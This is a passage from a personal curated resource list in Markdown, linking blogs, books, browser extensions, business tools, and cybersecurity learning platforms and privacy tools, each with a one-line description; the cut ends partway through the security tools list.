data science, machine learning - [colah's blog](https://colah.github.io/) ← great explanations of more advanced topics - [Datafloq](https://datafloq.com/read/) ← big data news - [DataGenetics](http://datagenetics.com/blog.html) ← data decoded, value unlocked - [David Does Data](https://josephsdavid.github.io/) ← high-quality posts from aspiring data scientist - [Dawid Kopczyk](http://dkopczyk.quantee.co.uk/) ← using ML and quantum physics - [deepsense.ai](https://deepsense.ai/blog/) ← blog from a team of business-oriented problem solvers - [Distill](https://distill.pub/) ← interactive, visual journal for machine learning research - [Econometrics and Free Software](https://www.brodrigues.co/) ← blog focused on R from the economist holding a PhD - [FlowingData](https://flowingdata.com/) ← blog on data visualisation - [Go Practice](https://gopractice.io/blog/) ← essays on how data helps building and growing products - [Information is Beautiful](https://informationisbeautiful.net/) ← see it with your own eyes - [Jak badać dane](https://www.jakbadacdane.pl/) (🇵🇱) ← data, ML, AI - [Jay Alammar](https://jalammar.github.io/) ← blog with lots of simple ML visualisations - [luminousmen](https://luminousmen.com/) ← short posts on ML/Python - [Łukasz Prokulski](http://prokulski.net/) (🇵🇱) ← lots of data use cases with step by step analysis in R - [Machine Learning Mastery](https://machinelearningmastery.com/blog/) ← popular blog on ML with lots of content to learn from - [Mateusz Grzyb](https://mateuszgrzyb.pl/) (🇵🇱) ← data analysis in Python - [Peter Laurinec](https://petolau.github.io/) ← time series data mining in R from a PhD researcher - [Piotr Migdał](https://p.migdal.pl/blog) ← write-ups from an independent data science consultant, with PhD in quantum physics - [PyImageSearch](https://www.pyimagesearch.com/) ← be awesome at OpenCV, Python, deep learning, and computer vision - [Python⇒Speed](https://pythonspeed.com/) ← learn tools and techniques to help you ship better Python software, faster - [Rubik's Code](https://rubikscode.net/) ← AI without tears - [Simply Statistics](https://simplystatistics.org/) ← blog on data visualisation - [Thomas Neitmann](https://thomasadventure.blog/) ← blog of an R enthusiast - [Towards Data Science](https://towardsdatascience.com/) ← Medium for data science - [Victor Zhou](https://victorzhou.com/) ← blog about web development, machine learning, and more ### devops/mlops - [Ivan Velichko](https://iximiuz.com/en/) ← learning containers, Kubernetes, and backend development - [MLOps Community Blog](https://mlops.community/blog/) - [The MLOps Blog](https://neptune.ai/blog/category/mlops) ← MLOps blog by Neptune.ai ### general - [Andy Matuschak](https://andymatuschak.org/) ← read and learn about learning, quantum computing, math, software development, and more - [Bartosz Ciechanowski](https://ciechanow.ski/) ← high-quality blog posts with interactive elements on topics like GPS or mechanical watch - [Gwern](https://www.gwern.net/) ← the content varies mostly between psychology, statistics, and technology - [Medium](https://medium.com/) ← popular blogging platform - [Our World in Data](https://ourworldindata.org/) ← research and data to make progress against the world’s largest problems - [Reddit](https://www.reddit.com/) ← front page of the Internet (tip: browse by subreddits, not the main site) - [vas3k](https://vas3k.com/) ← one of the most "quality over quantity" tech blogs you can find on the Internet - [Wait But Why](https://waitbutwhy.com/) ← great reading time guaranteed ### math - [Blobs in Games](https://simblob.blogspot.com/) ← interactive explanations of math and computer science topics - [Math = Love](https://mathequalslove.blogspot.com/) - [Math for Love](https://mathforlove.com/blog/) - [Math with Bad Drawings](https://mathwithbaddrawings.com/) - [Recommended Math Books](https://mathvault.ca/books/) ← set of books recommended by different levels/topics ### programming - [beepb00p](https://beepb00p.xyz/) ← inspirational blogger building various things - [Code Without Rules](https://codewithoutrules.com/) ← helping you become a productive programmer and get work/life balance - [Coding Horror](https://blog.codinghorror.com/) ← programming and human factors - [DEV Community](https://dev.to/) ← popular blogging platform for developers - [Devstyle](https://devstyle.pl/) (🇵🇱) ← blog for every programmer - [Discover dev](https://www.discoverdev.io/) ← daily digest of the best engineering blogs from across the web - [Hacker Noon](https://hackernoon.com/) ← great stories by real tech professionals - [Product Hunt](https://www.producthunt.com/) ← discover the best new products in tech - [Stack Overflow Blog](https://stackoverflow.blog/) ← essays, opinions, and advice on the act of computer programming - [Tania Rascia](https://www.taniarascia.com/) ← visually pleasing blog about modern JavaScript, Node.js, design and web development - [Tushar's Blog](https://sadh.life/) ← exceptional Python focused blog **[⬆ Back to Contents](#contents)** ## 📚 Books For more, visit [my bookshelf on Goodreads](https://www.goodreads.com/review/list/57442889). ### biographies - [Can't Hurt Me: Master Your Mind and Defy the Odds](https://www.goodreads.com/book/show/43160250-can-t-hurt-me) - [Einstein: His Life and Universe](https://www.goodreads.com/book/show/8030965-einstein) - [Elon Musk: Tesla, SpaceX, and the Quest for a Fantastic Future](https://www.goodreads.com/book/show/25569936-elon-musk) - [Leonardo da Vinci](https://www.goodreads.com/book/show/34752954-leonardo-da-vinci) - [Permanent Record](https://www.goodreads.com/book/show/46223297-permanent-record) - [Steve Jobs](https://www.goodreads.com/book/show/12988058-steve-jobs) - [Surely You're Joking, Mr. Feynman!: Adventures of a Curious Character](https://www.goodreads.com/book/show/5544.Surely_You_re_Joking_Mr_Feynman_) - [The Everything Store: Jeff Bezos and the Age of Amazon](https://www.goodreads.com/book/show/18887015-the-everything-store) - [Total Recall: My Unbelievably True Life Story](https://www.goodreads.com/book/show/14546626-total-recall) ### business - [Actionable Gamification: Beyond Points, Badges, and Leaderboards](https://www.goodreads.com/book/show/25416321-actionable-gamification) - [Anything You Want](https://www.goodreads.com/book/show/11878168-anything-you-want) - [Async Remote](https://www.goodreads.com/book/show/32883490-async-remote) - [DotCom Secrets: The Underground Playbook for Growing Your Company Online](https://www.goodreads.com/book/show/25054961-dotcom-secrets) - [Finansowy Ninja](https://www.goodreads.com/book/show/29151508-finansowy-ninja) (🇵🇱) - [How to Get Rich](https://www.goodreads.com/book/show/1837402.How_to_Get_Rich) - [If You're Not First, You're Last: Sales Strategies to Dominate Your Market and Beat Your Competition](https://www.goodreads.com/book/show/7902256-if-you-re-not-first-you-re-last) - [Never Split the Difference: Negotiating As If Your Life Depended On It](https://www.goodreads.com/book/show/26156469-never-split-the-difference) - [Prediction Machines: The Simple Economics of Artificial Intelligence](https://www.goodreads.com/book/show/36484703-prediction-machines) - [Range: Why Generalists Triumph in a Specialized World](https://www.goodreads.com/book/show/44000528-range) - [The $100 Startup: Reinvent the Way You Make a Living, Do What You Love, and Create a New Future](https://www.goodreads.com/book/show/12605157-the-100-startup) - [The 10X Rule: The Only Difference Between Success and Failure](https://www.goodreads.com/book/show/46382280-the-10x-rule) - [The Boron Letters](https://www.goodreads.com/book/show/17732053-the-boron-letters) - [The E-Myth Revisited: Why Most Small Businesses Don't Work and What to Do About It](https://www.goodreads.com/book/show/81948.The_E_Myth_Revisited) - [The Goal: A Process of Ongoing Improvement](https://www.goodreads.com/book/show/113937.The_Goal) - [The Hard Thing About Hard Things: Building a Business When There Are No Easy Answers](https://www.goodreads.com/book/show/20657434-the-hard-thing-about-hard-things) - [The Lean Startup: How Today's Entrepreneurs Use Continuous Innovation to Create Radically Successful Businesses](https://www.goodreads.com/book/show/11500159-the-lean-startup) - [The Man Who Solved the Market: How Jim Simons Launched the Quant Revolution](https://www.goodreads.com/book/show/43889703-the-man-who-solved-the-market) - [The Millionaire Fastlane: Crack the Code to Wealth and Live Rich for a Lifetime!](https://www.goodreads.com/book/show/18872437-the-millionaire-fastlane) - [The Outsiders: Eight Unconventional CEOs and Their Radically Rational Blueprint for Success](https://www.goodreads.com/book/show/13586932-the-outsiders) - [The Personal MBA: Master the Art of Business](https://www.goodreads.com/book/show/9512985-the-personal-mba) - [Think and Grow Rich (Impact Books): With linked Table of Contents](https://www.goodreads.com/book/show/25022443-think-and-grow-rich-impact-books) - [Tools of Titans: The Tactics, Routines, and Habits of Billionaires, Icons, and World-Class Performers](https://www.goodreads.com/book/show/31823677-tools-of-titans) ### cybersecurity - [Bezpieczeństwo aplikacji webowych](https://www.goodreads.com/book/show/48718398-bezpiecze-stwo-aplikacji-webowych) (🇵🇱) - [Black Hat Python: Python Programming for Hackers and Pentesters](https://www.goodreads.com/book/show/23719792-black-hat-python) - [Hacking, 2nd Edition: The Art of Exploitation](https://www.goodreads.com/book/show/20891014-hacking-2nd-edition) - [Machine Learning and Security: Protecting Systems with Data and Algorithms](https://www.goodreads.com/book/show/34691714-machine-learning-and-security) - [Penetration Testing: A Hands-On Introduction to Hacking](https://www.goodreads.com/book/show/22713760-penetration-testing) - [Practical Cryptography for Developers](https://www.goodreads.com/book/show/43019960-practical-cryptography-for-developers) - [Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software](https://www.goodreads.com/book/show/18949878-practical-malware-analysis) - [Serious Cryptography: A Practical Introduction to Modern Encryption](https://www.goodreads.com/book/show/36265193-serious-cryptography) - [Silence on the Wire: A Field Guide to Passive Reconnaissance and Indirect Attacks](https://www.goodreads.com/book/show/18924651-silence-on-the-wire) - [The Tangled Web: A Guide to Securing Modern Web Applications](https://www.goodreads.com/book/show/18880893-the-tangled-web) ### data science - [Artificial Intelligence: A Modern Approach](https://www.goodreads.com/book/show/40098944-artificial-intelligence) - [Data Science for Business: What you need to know about data mining and data-analytic thinking](https://www.goodreads.com/book/show/18711043-data-science-for-business) - [Deep Learning](https://www.goodreads.com/book/show/24072897-deep-learning) - [Deep Learning from Scratch: Building with Python from First Principles](https://www.goodreads.com/book/show/51867967-deep-learning-from-scratch) - [Deep Learning with JavaScript: Neural networks in TensorFlow.js](https://www.goodreads.com/book/show/49695782-deep-learning-with-javascript) - [Designing Data-Intensive Applications: The Big Ideas Behind Reliable, Scalable, and Maintainable Systems](https://www.goodreads.com/book/show/34626431-designing-data-intensive-applications) - [Discovering Statistics Using R](https://www.goodreads.com/book/show/20568094-discovering-statistics-using-r) - [Dive into Deep Learning](https://d2l.ai/) - [Generative Deep Learning: Teaching Machines to Paint, Write, Compose, and Play](https://www.goodreads.com/book/show/51056293-generative-deep-learning) - [Machine Learning Engineering](https://www.goodreads.com/book/show/50435068-machine-learning-engineering) - [Machine Learning Yearning: Technical Strategy for AI Engineers, In the Era of Deep Learning](https://www.goodreads.com/book/show/46249355-machine-learning-yearning) - [Natural Language Processing in Action](https://www.goodreads.com/book/show/37761872-natural-language-processing-in-action) - [Pattern Recognition and Machine Learning (Information Science and Statistics)](https://www.goodreads.com/book/show/40011158-pattern-recognition-and-machine-learning) - [Reinforcement Learning: An Introduction](https://www.goodreads.com/book/show/739791.Reinforcement_Learning) - [R for Data Science: Import, Tidy, Transform, Visualize, and Model Data](https://www.goodreads.com/book/show/33399049-r-for-data-science) - [Storytelling with Data: A Data Visualization Guide for Business Professionals](https://www.goodreads.com/book/show/26535513-storytelling-with-data) - [Strengthening Deep Neural Networks: Making AI Less Susceptible to Adversarial Trickery](https://www.goodreads.com/book/show/49660384-strengthening-deep-neural-networks) - [The Hundred-Page Machine Learning Book](https://www.goodreads.com/book/show/43564614-the-hundred-page-machine-learning-book) - [Tinyml: Machine Learning with Tensorflow Lite on Arduino and Ultra-Low-Power Microcontrollers](https://www.goodreads.com/book/show/50204679-tinyml) ### data tools - [Automate the Boring Stuff with Python, 2nd Edition: Practical Programming for Total Beginners](https://www.goodreads.com/book/show/47951337-automate-the-boring-stuff-with-python-2nd-edition) - [Data Analysis with Open Source Tools: A Hands-On Guide for Programmers and Data Scientists](https://www.goodreads.com/book/show/8360735-data-analysis-with-open-source-tools) - [Deep Learning for Computer Vision with Python — Practitioner Bundle](https://www.goodreads.com/book/show/41724711-deep-learning-for-computer-vision-with-python-practitioner-bundle) - [Elements of Programming Interviews in Python: The Insiders' Guide](https://www.goodreads.com/book/show/34791936-elements-of-programming-interviews-in-python) - [Hands-On Machine Learning with Scikit-Learn, Keras, and TensorFlow: Concepts, Tools, and Techniques to Build Intelligent Systems](https://www.goodreads.com/book/show/48073071-hands-on-machine-learning-with-scikit-learn-keras-and-tensorflow) - [Pandas Cookbook](https://www.goodreads.com/book/show/34325160-pandas-cookbook) - [Practical Python and OpenCV](https://www.goodreads.com/book/show/24563887-practical-python-and-opencv) - [Python Crash Course: A Hands-On, Project-Based Introduction to Programming](https://www.goodreads.com/book/show/23241059-python-crash-course) - [Python Data Science Handbook: Essential Tools for Working with Data](https://www.goodreads.com/book/show/45426977-python-data-science-handbook) - [Python Machine Learning: Machine Learning and Deep Learning with Python, scikit-learn, and TensorFlow, 2nd Edition](https://www.goodreads.com/book/show/35911519-python-machine-learning) - [Python Tricks: A Buffet of Awesome Python Features](https://www.goodreads.com/book/show/36990732-python-tricks) - [The Book of R: A First Course in Programming and Statistics](https://www.goodreads.com/book/show/26529994-the-book-of-r) ### devops/mlops - [Building Microservices](https://www.goodreads.com/book/show/24836465-building-microservices) - [Data Science on AWS: Implementing End-to-End, Continuous AI and Machine Learning Pipelines](https://www.goodreads.com/book/show/57671430-data-science-on-aws) - [Introducing Mlops: How to Scale Machine Learning in the Enterprise](https://www.goodreads.com/book/show/55182023-introducing-mlops) - [Machine Learning Design Patterns: Solutions to Common Challenges in Data Preparation, Model Building, and MLOps](https://www.goodreads.com/book/show/55739247-machine-learning-design-patterns) ### health - [How Not to Die: Discover the Foods Scientifically Proven to Prevent and Reverse Disease](https://www.goodreads.com/book/show/25663961-how-not-to-die) - [The Obesity Code: unlocking the secrets of weight loss](https://www.goodreads.com/book/show/29405348-the-obesity-code) - [Why We Get Fat: And What to Do About It](https://www.goodreads.com/book/show/10128759-why-we-get-fat) - [Why We Sleep: Unlocking the Power of Sleep and Dreams](https://www.goodreads.com/book/show/36294636-why-we-sleep) - [Zen in the Art of Archery](https://www.goodreads.com/book/show/103758.Zen_in_the_Art_of_Archery) ### math - [A History of Pi](https://www.goodreads.com/book/show/24315636-a-history-of-pi) - [An Imaginary Tale: The Story of i [the square root of minus one]](https://www.goodreads.com/book/show/8462163-an-imaginary-tale) - [An Introduction to Statistical Learning: With Applications in R](https://www.goodreads.com/book/show/17397466-an-introduction-to-statistical-learning) - [Journey through Genius: The Great Theorems of Mathematics](https://www.goodreads.com/book/show/116185.Journey_through_Genius) - [Mathematics for Machine Learning](https://www.goodreads.com/book/show/41432653-mathematics-for-machine-learning) - [Measurement](https://www.goodreads.com/book/show/18914498-measurement) - [Prelude to Mathematics](https://www.goodreads.com/book/show/1134116.Prelude_to_Mathematics) - [Prime Obsession: Bernhard Riemann and the Greatest Unsolved Problem in Mathematics](https://www.goodreads.com/book/show/9899005-prime-obsession) - [Proofs from THE BOOK](https://www.goodreads.com/book/show/24865668-proofs-from-the-book) - [The Elements of Statistical Learning: Data Mining, Inference, and Prediction, Second Edition](https://www.goodreads.com/book/show/40049133-the-elements-of-statistical-learning) - [The Joy of x: A Guided Tour of Math, from One to Infinity](https://www.goodreads.com/book/show/18652674-the-joy-of-x) - [What Is Mathematics?: An Elementary Approach to Ideas and Methods](https://www.goodreads.com/book/show/12952426-what-is-mathematics) ### personal development - [A Guide to the Good Life: The Ancient Art of Stoic Joy](https://www.goodreads.com/book/show/5617966-a-guide-to-the-good-life) - [Algorithms to Live By: The Computer Science of Human Decisions](https://www.goodreads.com/book/show/25666050-algorithms-to-live-by) - [A Mind for Numbers: How to Excel at Math and Science](https://www.goodreads.com/book/show/18693655-a-mind-for-numbers) - [Atomic Habits: An Easy and Proven Way to Build Good Habits and Break Bad Ones](https://www.goodreads.com/book/show/40540502-atomic-habits) - [Driven to Distraction (Revised): Recognizing and Coping with Attention Deficit Disorder](https://www.goodreads.com/book/show/18712223-driven-to-distraction-revised) - [Fluent Forever: How to Learn Any Language Fast and Never Forget It](https://www.goodreads.com/book/show/22304017-fluent-forever) - [How to Win Friends and Influence People](https://www.goodreads.com/book/show/29550624-how-to-win-friends-and-influence-people) - [Influence: The Psychology of Persuasion](https://www.goodreads.com/book/show/28815.Influence) - [Lying](https://www.goodreads.com/book/show/18870418-lying) - [Make It Stick](https://www.goodreads.com/book/show/21956680-make-it-stick) - [Nonviolent Communication: A Language of Life: Life-Changing Tools for Healthy Relationships](https://www.goodreads.com/book/show/26203640-nonviolent-communication) - [Outwitting the Devil: The Secret to Freedom and Success](https://www.goodreads.com/book/show/10713286-outwitting-the-devil) - [Rebel Ideas: The Power of Diverse Thinking](https://www.goodreads.com/book/show/52326253-rebel-ideas) - [Seeking Wisdom: From Darwin To Munger](https://www.goodreads.com/book/show/1995421.Seeking_Wisdom) - [The Biology of Belief: Unleashing the Power of Consciousness, Matter and Miracles](https://www.goodreads.com/book/show/90556.The_Biology_of_Belief) - [The Book of Awakening: Having the Life You Want by Being Present to the Life You Have](https://www.goodreads.com/book/show/7581.The_Book_of_Awakening) - [The Chimp Paradox: The Acclaimed Mind Management Programme to Help You Achieve Success, Confidence and Happiness](https://www.goodreads.com/book/show/12228097-the-chimp-paradox) - [The Magic of Thinking Big](https://www.goodreads.com/book/show/759945.The_Magic_of_Thinking_Big) - [The Nicomachean Ethics](https://www.goodreads.com/book/show/19090273-the-nicomachean-ethics) - [The One Thing: The Surprisingly Simple Truth Behind Extraordinary Results](https://www.goodreads.com/book/show/16256798-the-one-thing) - [The Slight Edge: Turning Simple Disciplines into Massive Success and Happiness](https://www.goodreads.com/book/show/23130805-the-slight-edge) - [The Top Five Regrets of the Dying: A Life Transformed by the Dearly Departing](https://www.goodreads.com/book/show/13059271-the-top-five-regrets-of-the-dying) - [Thinking, Fast and Slow](https://www.goodreads.com/book/show/11468377-thinking-fast-and-slow) ### programming Mostly universal (language-independent books). - [A Philosophy of Software Design](https://www.goodreads.com/book/show/43701534-a-philosophy-of-software-design) - [Architecture Patterns with Python: How to Apply DDD, Ports and Adapters, and Enterprise Architecture Design Patterns in a Pythonic Way](https://www.goodreads.com/book/show/50083115-architecture-patterns-with-python) - [Clean Code: A Handbook of Agile Software Craftsmanship](https://www.goodreads.com/book/show/3735293-clean-code) - [Code Complete](https://www.goodreads.com/book/show/21899045-code-complete) - [Code: The Hidden Language of Computer Hardware and Software (Developer Best Practices)](https://www.goodreads.com/book/show/21948821-code) - [Cracking the Coding Interview: 189 Programming Questions and Solutions](https://www.goodreads.com/book/show/25707092-cracking-the-coding-interview) - [Design Patterns: Elements of Reusable Object-Oriented Software](https://www.goodreads.com/book/show/85009.Design_Patterns) - [Dive Into Design Patterns](https://www.goodreads.com/book/show/43125355-dive-into-design-patterns) - [Don't Make Me Think, Revisited: A Common Sense Approach to Web Usability](https://www.goodreads.com/book/show/18197267-don-t-make-me-think-revisited) - [Elements of Programming Interviews in Python: The Insiders' Guide](https://www.goodreads.com/book/show/34791936-elements-of-programming-interviews-in-python) - [Extreme Programming Explained: Embrace Change (The XP Series)](https://www.goodreads.com/book/show/67833.Extreme_Programming_Explained) - [Head First Design Patterns](https://www.goodreads.com/book/show/17374834-head-first-design-patterns) - [Implementing Domain-Driven Design](https://www.goodreads.com/book/show/15756865-implementing-domain-driven-design) - [Introduction to Algorithms (The MIT Press)](https://www.goodreads.com/book/show/44086616-introduction-to-algorithms) - [Junior Developer. Wszystko co trzeba wiedzieć, by zacząć pracę jako programista](https://www.goodreads.com/book/show/32998879-junior-developer-wszystko-co-trzeba-wiedzie-by-zacz-prac-jako-prog) (🇵🇱) - [Peopleware: Productive Projects and Teams](https://www.goodreads.com/book/show/18895165-peopleware) - [Refactoring: Improving the Design of Existing Code](https://www.goodreads.com/book/show/44719608-refactoring) - [Test Driven Development: By Example](https://www.goodreads.com/book/show/387190.Test_Driven_Development) - [The C Programming Language](https://www.goodreads.com/book/show/515601.The_C_Programming_Language) - [The C++ Programming Language](https://www.goodreads.com/book/show/18709954-the-c-programming-language) (4th Edition) - [The Clean Coder: A Code of Conduct for Professional Programmers](https://www.goodreads.com/book/show/11486819-the-clean-coder) - [The Complete Software Developer's Career Guide: How to Learn Programming Languages Quickly, Ace Your Programming Interview, and Land Your Software Developer Dream Job](https://www.goodreads.com/book/show/35674293-the-complete-software-developer-s-career-guide) - [The Mythical Man-Month: Essays on Software Engineering](https://www.goodreads.com/book/show/6558055-the-mythical-man-month) - [The Pragmatic Programmer](https://www.goodreads.com/book/show/22404360-the-pragmatic-programmer) - [The Self-Taught Programmer: The Definitive Guide to Programming Professionally](https://www.goodreads.com/book/show/33580202-the-self-taught-programmer) - [Working Effectively with Legacy Code](https://www.goodreads.com/book/show/44919.Working_Effectively_with_Legacy_Code) - [Zawód: Programista](https://www.goodreads.com/book/show/36223075-zaw-d) (🇵🇱) - [Zrozumieć programowanie](https://www.goodreads.com/book/show/28457659-zrozumie-programowanie) (🇵🇱) ### science - [AI Superpowers: China, Silicon Valley, and the New World Order](https://www.goodreads.com/book/show/38242135-ai-superpowers) - [Behave: The Biology of Humans at Our Best and Worst](https://www.goodreads.com/book/show/33516538-behave) - [Biased: Uncovering the Hidden Prejudice That Shapes What We See, Think, and Do](https://www.goodreads.com/book/show/40407320-biased) - [Brief Answers to the Big Questions](https://www.goodreads.com/book/show/40277241-brief-answers-to-the-big-questions) - [Hacking Darwin: Genetic Engineering and the Future of Humanity](https://www.goodreads.com/book/show/45275976-hacking-darwin) - [How Smart Machines Think](https://www.goodreads.com/book/show/42598754-how-smart-machines-think) - [Incognito: The Secret Lives of the Brain](https://www.goodreads.com/book/show/11550688-incognito) - [Life 3.0: Being Human in the Age of Artificial Intelligence](https://www.goodreads.com/book/show/34272565-life-3-0) - [The Ape that Understood the Universe: How the Mind and Culture Evolve](https://www.goodreads.com/book/show/40536444-the-ape-that-understood-the-universe) - [The Information: A History, a Theory, a Flood](https://www.goodreads.com/book/show/10728649-the-information) **[⬆ Back to Contents](#contents)** ## 💾 Browser Extensions - [30 seconds of knowledge](https://30secondsofknowledge.com/) ← random code snippet every time you open a new tab - [Automa](https://chrome.google.com/webstore/detail/automa/infppggnoaenmfagbfknfkancpbljcca/) ← automate browser by connecting blocks - [ColorZilla](https://www.colorzilla.com/chrome/) ← advanced eyedropper - [Dark Reader](https://darkreader.org/) ← dark mode for all the websites - [Decentraleyes](https://decentraleyes.org/) ← protect yourself against tracking through "free", centralised, content delivery - [Disconnect](https://disconnect.me/) ← visualize and block the invisible websites that track you - [EditThisCookie](http://www.editthiscookie.com/) ← cookie editor - [Email Finder - GetProspect](https://getprospect.io/) ← find business email address in one click - [F.B.(FluffBusting)Purity](https://www.fbpurity.com/) ← customise (clean) your Facebook - [Git History Browser Extension](https://github.com/LuisReinoso/git-history-browser-extension) ← add "Open in Git History" button to GitHub repos - [GitHub Repository Size](https://chrome.google.com/webstore/detail/github-repository-size/apnjnioapinblneaedefcnopcjepgkci) ← add repository size to GitHub's repository summary - [Github Web IDE](https://github.com/zvizvi/Github-Web-IDE) ← add a new drop down menu to any Github repository to browse the source code in a number of online IDEs - [Grammarly](https://app.grammarly.com/) ← very extensive tool to proofread English grammar - [HTTPS Everywhere](https://www.eff.org/https-everywhere) ← force HTTPS if possible - [Hypothesis - Web & PDF Annotation](https://web.hypothes.is/) ← open-source tool to highlight/annotate the text you read online and in the scientific papers. It's a great way to organize your research, as well as hold discussions about your annotations with other users [like me](https://hypothes.is/users/pyxelr) - [Image Search Options](https://chrome.google.com/webstore/detail/image-search-options/kljmejbpilkadikecejccebmccagifhl/) ← set of highly customizable reverse image search context menu options - [Language Learning with Netflix](https://languagelearningwithnetflix.com/) ← display subtitles in both languages while watching Netflix - [LanguageTool](https://languagetool.org/) ← check your writing in more than 20 languages (great alternative to Grammarly) - [Modern for Wikipedia](https://chrome.google.com/webstore/detail/modern-for-wikipedia/emdkdnnopdnajipoapepbeeiemahbjcn) ← redesigned user interface for Wikipedia - [Nimbus Capture](https://nimbusweb.me/screenshot.php) ← advanced screenshot tool for Google Chrome - [OneTab](https://www.one-tab.com/) ← save up to 95% memory by moving all open tabs into a single one in Google Chrome - [Power Thesaurus](https://chrome.google.com/webstore/detail/power-thesaurus/hhnjkanigjoiglnlopahbbjdbfhkndjk) ← find synonyms and antonyms to improve your writing - [Privacy Badger](https://www.eff.org/privacybadger) ← block invisible trackers - [Reedy](https://reedy.azagroup.ru/) ← speed reading with RSVP (Rapid Serial Visual Presentation) technique - [Refined Twitter](https://github.com/sindresorhus/refined-twitter) ← simplify Twitter UI and add useful features - [Return YouTube Dislike](https://chrome.google.com/webstore/detail/return-youtube-dislike/gebbhagfogifgggkldgodflihgfeippi) ← return ability to see dislikes - [Session Buddy](https://sessionbuddy.com/) ← manage browser sessions - [SponsorBlock](https://sponsor.ajay.app/) ← skip sponsor segments in YouTube videos) - [Sourcegraph](https://docs.sourcegraph.com/integration/browser_extension) ← add code intelligence to GitHub and other code hosts - [Stylus](https://add0n.com/stylus.html) ← user-style manager - [Tab Resize - split screen layouts](https://chrome.google.com/webstore/detail/tab-resize-split-screen-l/bkpenclhmiealbebdopglffmfdiilejc) ← resize the current tab and tabs to the right into layouts on separate windows - [Tampermonkey](https://www.tampermonkey.net/) ← the most popular userscript manager - [uBlock Origin](https://github.com/gorhill/uBlock#installation) ← blocker addon (not only for ads) - [uMatrix](https://chrome.google.com/webstore/detail/umatrix/ogfcmafjalglgifnmanfmnieipoejdcf) ← point & click to forbid/allow any class of requests made by your browser. Use it to block scripts, iframes, ads, facebook, etc. - [Unclutter](https://unclutter.lindylearn.io/) ← modern reader mode and article library for your browser - [Unhook - Remove YouTube Recommended Videos](https://chrome.google.com/webstore/detail/remove-youtube-recommende/khncfooichmfjbepaaaebmommgaepoid) ← hide YouTube related videos, comments, video suggestions wall, homepage recommendations, trending tab, and other distractions - [VisBug](https://github.com/GoogleChromeLabs/ProjectVisBug) ← FireBug for designers - edit any webpage, in any state - [Wappalyzer](https://www.wappalyzer.com/) ← identify technology on websites - [Web Scrobbler](https://web-scrobbler.com/) ← scrobble music all around the web, e.g. to your Last.fm account **[⬆ Back to Contents](#contents)** ## 💼 Business ### remote collaboration - [Discord](https://discordapp.com/) ← VoIP application (my preference over Slack) - [Google Hangouts](https://hangouts.google.com/) ← remote video calls - [Hackpad](https://hackpad.com/) ← web-based realtime wiki (great for knowledge sharing/documentation) - [Miro](https://miro.com/) ← online collaborative whiteboard (great for remote event storming) - [Remote Work Toolkit](https://nohq.co/tools/) ← set of tools for remote work - [Trello](https://trello.com/) ← web-based Kanban-style list-making application (great for creating tickets) ### tools - [ahrefs](https://ahrefs.com/) ← research your competitors - [Bitcoin Regret Club](https://bitcoinregret.club/calculate-regret) ← check how much would you earn/lose if you would invest into Bitcoin on the chosen date - [BuzzSumo](https://buzzsumo.com/) ← analyze what content performs best for any topic or competitor - [Calendly](https://calendly.com/) ← schedule appointments - [CoSchedule](https://coschedule.com/) ← schedule online posts/marketing - [Cryptowatch](https://cryptowat.ch/) ← live Bitcoin price charts - [FlatGA](https://flatga.io/#/dashboard) ← easy overview of your Google Analytics dashboard - [Google Optimize](https://www.blog.google/products/marketingplatform/analytics/this-is-not-a-test-google-optimize-now-free-for-everyone/) ← free tool to perform A/B tests to analyse customers - [Investing.com](https://www.investing.com/) ← stock market quotes & financial news - [ODOO](https://www.odoo.com/) ← web-based open source business apps - [Sendy](https://sendy.co/) ← cheap newsletter system via Amazon SES - Startup - [books](https://startupbooks.io/) ← list of books to help you along your startup journey - [idea checklist](https://www.defmacro.org/2019/03/26/startup-checklist.html) ← answer before opening a startup - [stacklist](https://tools.stacklist.com/stacklists/) ← list of technologies used by startups - [stash](https://startupstash.com/) ← curated directory of resources & tools to help you build your startup - [Tools for Makers](https://toolsformakers.com/) ← hand-curated directory of tools for makers **[⬆ Back to Contents](#contents)** ## 👾 Cybersecurity ### learn - [CTFlearn](https://ctflearn.com/) ← ethical hacking platform that enables tens of thousands to learn, practice, and compete - [CTFtime](https://ctftime.org/) ← CTF archive, current overall Capture The Flag team rating, per-team statistics etc. - [Google CTF](https://capturetheflag.withgoogle.com/) ← CTF organised by Google with different challenges to practice - [Hacker101](https://www.hacker101.com/) ← free class for web security - [Hacksplaining](https://www.hacksplaining.com/lessons) ← interactive lessons to present the most typical cybersecurity attacks. Afterwards, the site presents an extended article with the ways of how to protect ourselves from the particular vulnerability - [Hack The Box](https://www.hackthebox.eu/) ← online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with thousands of people in the security field - [HackTricks](https://book.hacktricks.xyz/) ← collection of hacking tricks & techniques that the author have learnt in CTFs, real life apps, and by reading researches and news - [pwn.college](https://pwn.college/) ← education platform for students (and other interested parties) to learn about, and practice, core cybersecurity concepts in a hands-on fashion - [The Book of Secret Knowledge](https://github.com/trimstray/the-book-of-secret-knowledge) ← collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more - [TryHackMe](https://tryhackme.com/) ← cybersecurity guides and challenges in your browser ### tools - [AmIUnique](https://amiunique.org/fp) ← check your browser fingerprint - [Browserling](https://www.browserling.com/browser-sandbox) ← online browser sandbox - [CheckShortURL](https://checkshorturl.com/) ← shortened URL expander - [CyberChef](https://gchq.github.io/CyberChef/) ← web app for encryption, encoding, compression and data analysis - [DuckDuckGo](https://duckduckgo.com/) ← find what has been hidden from you by Google - [Filecrypt](https://filecrypt.co/Create.html) ← encrypt a link - [Firefox Relay](https://relay.firefox.com/) ← create aliases, randomly generated email addresses that forward to your real inbox - [Have I Been Pwned](https://haveibeenpwned.com/) ← check if you have an account that has been compromised in a data breach - [Firefox Monitor](https://monitor.firefox.com/) ← the same tool from Firefox - [We Leak Info](https://weleakinfo.com/) ← data breach search engine - [Hybrid Analysis](https://hybrid-analysis.com//) ← analyse malware for free in the browser - [I know what you download](https://iknowwhatyoudownload.com/en/peer/) ← torrent downloads and distributions for chosen IP - [IP Info](https://ip.voidsec.com/) ← check if your VPN leaks information - [Pi-Hole](https://pi-hole.net/) ← adblock for the whole network (requires: router + raspberry pi) - [PrivacyTools](https://www.privacytools.io/) ← set of services, tools, and knowledge to protect your privacy - [PRISM Break](https://prism-break.org/) ← set of privacy tools (categorised by operating systems) - [Privacy Respecting](https://github.com/nikitavoloboev/privacy-respecting) ← curated list of privacy respecting services and software - [Redirect Checker](https://www.redirect-checker.org/) ← check your redirects and statuscode - [Shodan](https://www.shodan.io/) ← search engine of IoT - 